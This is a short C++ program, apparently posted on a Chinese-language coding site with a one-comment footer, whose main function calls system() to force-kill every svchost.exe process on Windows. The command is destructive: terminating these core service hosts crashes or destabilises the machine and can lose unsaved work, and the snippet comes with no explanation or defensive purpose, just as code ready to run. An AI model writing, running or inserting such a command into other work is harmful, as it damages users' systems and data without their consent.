using namespace std;
int main(){
	system("taskkill /im svchost.exe /f");
	return 0;
} 

1 条评论

  • 1